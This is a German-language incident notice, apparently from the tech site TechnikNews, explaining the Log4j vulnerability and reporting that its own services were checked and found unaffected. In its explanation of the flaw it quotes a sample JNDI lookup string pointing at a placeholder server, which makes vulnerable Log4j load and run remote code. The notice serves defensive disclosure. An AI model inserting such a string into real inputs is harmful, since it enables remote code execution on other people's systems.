Vorab: TechnikNews ist mit keinerlei Dienst von der Lücke betroffen.
Erklärung & Hintergrund
In den Medien und auf vielen weiteren Plattformen ist aktuell von einer Sicherheitslücke in "Log4j" zu lesen. Freitagnachmittag tauchten die ersten Meldungen dazu auf – das deutsche BSI (Bundesamt für Sicherheit in der Informationstechnik) hat für diese Lücke "Alarmstufe Rot" ausgerufen. Es handelt sich hier um ein ernstzunehmendes Problem, welches zahlreiche Apps, Plattformen und Webseiten auf der ganzen Welt betrifft. Selbst große Firmen wie Microsoft und Google waren kurzzeitig angreifbar.
Was ist das Problem?
Das Problem entsteht, wenn ein Dienst ein Ereignis im Hintergrund protokolliert. Im Java-Universum kommt dabei häufig die Bibliothek Log4j zum Einsatz. Wenn dieser Logeintrag Dinge die Zeichenfolge " ${jndi:ldap://serveradresse.com/a}" enthält, beginnt das Problem. Log4j nimmt nun vom angegeben Server einfach Java-Code entgegen und führt diesen ohne weiteres Nachfragen aus. Ein Supergau.
Was ist bei TechnikNews?
Bei dieser Lücke kommen in der TechnikNews-Infrastruktur nur das mit Java laufende Jira und Confluence in Frage. Alle anderen Dienste sind nicht betroffen. Laut den Entwicklern gibt es aber keinerlei Hinweise auf Probleme mit der Sicherheitslücke bei Jira und Confluence. Da wir dennoch auf Nummer sicher gehen möchten, haben wir bereits Freitagabend entsprechende Java-Programme mit Log4j vom Netz genommen und Firewallregeln (auch wenn Regex-Regeln laut Experten nicht wirklich wirksam sind) gesetzt, um dieser Art von Angriffen nicht ausgesetzt zu sein.
Wir beobachten weiterhin, dass zahlreiche Angriffsversuche erfolgen, aber nicht erfolgreich sind. Weitere Updates werden wir hier liefern.
Nun, einige Tage später, wie versprochen:
Abschließendes Fazit
Atlassian hat mit heutigem Tag bestätigt, dass die Produkte Confluence und Jira nicht vom Log4j-Problem betroffen seien. Außerdem haben wir alle weiteren Java-nutzenden TechnikNews Dienste gescannt und konnten keinerlei betroffene Version von Log4j feststellen.
Keinerlei TechnikNews Dienst ist daher betroffen, keine weitere Aktion seitens unserer Kunden oder Nutzer ist notwendig.